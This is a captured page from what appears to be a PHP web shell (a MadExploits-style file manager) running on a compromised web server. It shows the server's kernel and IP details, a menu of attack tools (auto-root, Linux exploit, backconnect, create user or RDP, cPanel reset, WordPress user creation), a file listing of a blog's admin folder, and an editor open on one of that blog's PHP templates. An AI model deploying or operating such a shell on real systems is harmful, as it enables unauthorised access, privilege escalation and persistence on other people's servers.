Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.202.60
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
page
[ DIR ]
drwxr-xr-x
add-blog-category-child.php
4.49
KB
-rw-r--r--
add-blog-category.php
3.58
KB
-rw-r--r--
add-blog-post.php
6.97
KB
-rw-r--r--
add-product.php
2.73
KB
-rw-r--r--
auth-login.php
3.71
KB
-rw-r--r--
blog-category-dashboard.php
5.25
KB
-rw-r--r--
blog-post-celebrity-style.php
5.98
KB
-rw-r--r--
blog-post-dashboard.php
4.73
KB
-rw-r--r--
blog-post-preferences.php
6.01
KB
-rw-r--r--
delete-category.php
667
B
-rw-r--r--
delete-post.php
656
B
-rw-r--r--
delete-product.php
650
B
-rw-r--r--
delete-subscriber.php
662
B
-rw-r--r--
edit-category.php
5.59
KB
-rw-r--r--
edit-post.php
7.61
KB
-rw-r--r--
edit-product.php
3.58
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
index.php
758
B
-rw-r--r--
logout.php
102
B
-rw-r--r--
products.php
4.61
KB
-rw-r--r--
save-category.php
1.61
KB
-rw-r--r--
save-child-category.php
1.69
KB
-rw-r--r--
save-post.php
2.43
KB
-rw-r--r--
save-preferences-must-read.php
1
KB
-rw-r--r--
save-preferences-style-prefere...
1.01
KB
-rw-r--r--
save-product.php
1.53
KB
-rw-r--r--
subscribers.php
3.81
KB
-rw-r--r--
update-category.php
2.23
KB
-rw-r--r--
update-post.php
2.94
KB
-rw-r--r--
update-product.php
1.67
KB
-rw-r--r--
uploadImage.php
120
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog-post-preferences.php
<?php $data['seoTitle'] = 'Blog Post Preferences | Admin | '; extract($data); ?> <?php require_once "inc/header.php" ?> <!--Content Start--> <div class="content-start transition "> <div class="container-fluid dashboard"> <section class="section"> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-header"> <h4 class="card-title d-block"> <div class="d-flex justify-content-between"> <div class="pt-2"> <i class='bx bxs-dashboard'></i> Blog Post "<strong>Must Read</strong>" Preferences </div> <form id="savePreferences" action="save-preferences-must-read.php" method="post"> <button class="btn btn-primary btn-sm type=" submit"> <i class="bx bx-save" style=""></i> Save Preferences </button> </form> </div> </h4> </div> <table class="card-body py-3 pb-5 datatables-basic table border-top table-sm"> <thead> <tr> <th class="text-center text-dark"> <input type="checkbox" class="form-check-input" id="selectAllCheckBox"> </th> <th class="text-center text-dark">#</th> <th class="text-left text-dark">Post</th> <th class="text-left text-dark">Category</th> <th class="text-center text-dark">Description</th> <th class="text-center text-dark">Created</th> <th class="text-center text-dark pr-5"><span class="pr-4">Action</span></th> </tr> </thead> <tbody> <?php $mustReadArr = explode(',', getSetting('mustReadPostArr')->value); ?> <?php $PostsData = getAllPosts(); ?> <?php if (mysqli_num_rows($PostsData) > 0) { ?> <?php $j = 1; while ($row = mysqli_fetch_assoc($PostsData)) { ?> <tr> <td class="text-center text-dark pt-4"> <input type="checkbox" class="form-check-input checkBox" name="postid[]" value="<?= $row['id'] ?>" form="savePreferences" <?= (in_array($row['id'], $mustReadArr)) ? 'checked' : null ?> /> </td> <td class="text-center text-dark pt-4"> <?= $j ?> </td> <td class="text-left pt-4"> <span class="font-weight-light"> <?= ucwords($row['name']) ?> </span> </td> <td class="text-left pt-4"> <span class="font-weight-light"> <?= d2t($row['cat_uri']) ?> </span> </td> <td class="text-left pt-4"> <span class="font-weight-light"> <?= $row['seo_description'] ?> </span> </td> <td class="text-center pt-4"> <span class="font-weight-light"> <?= date('h:m A - d M, Y', strtotime($row['created'])) ?> </span> </td> <td class="text-center pt-4"> <div class="buttons"> <a href="<?= base_url('admin/edit-post.php?id=' . $row['id']) ?>" class="btn btn-sm btn-warning"> <i class="bx bx-edit"></i> </a> <button onclick="dc('<?= base_url("admin/delete-post.php?id=" . $row["id"]) ?>')" class="btn btn-sm btn-danger mt-0"> <i class="bx bx-trash"></i> </button> </div> </td> </tr> <?php $j++; } } ?> </tbody> </table> </div> </div> </div> </section> </div><!-- End Container--> </div><!-- End Content--> <?php require_once "inc/footer.php" ?>
Close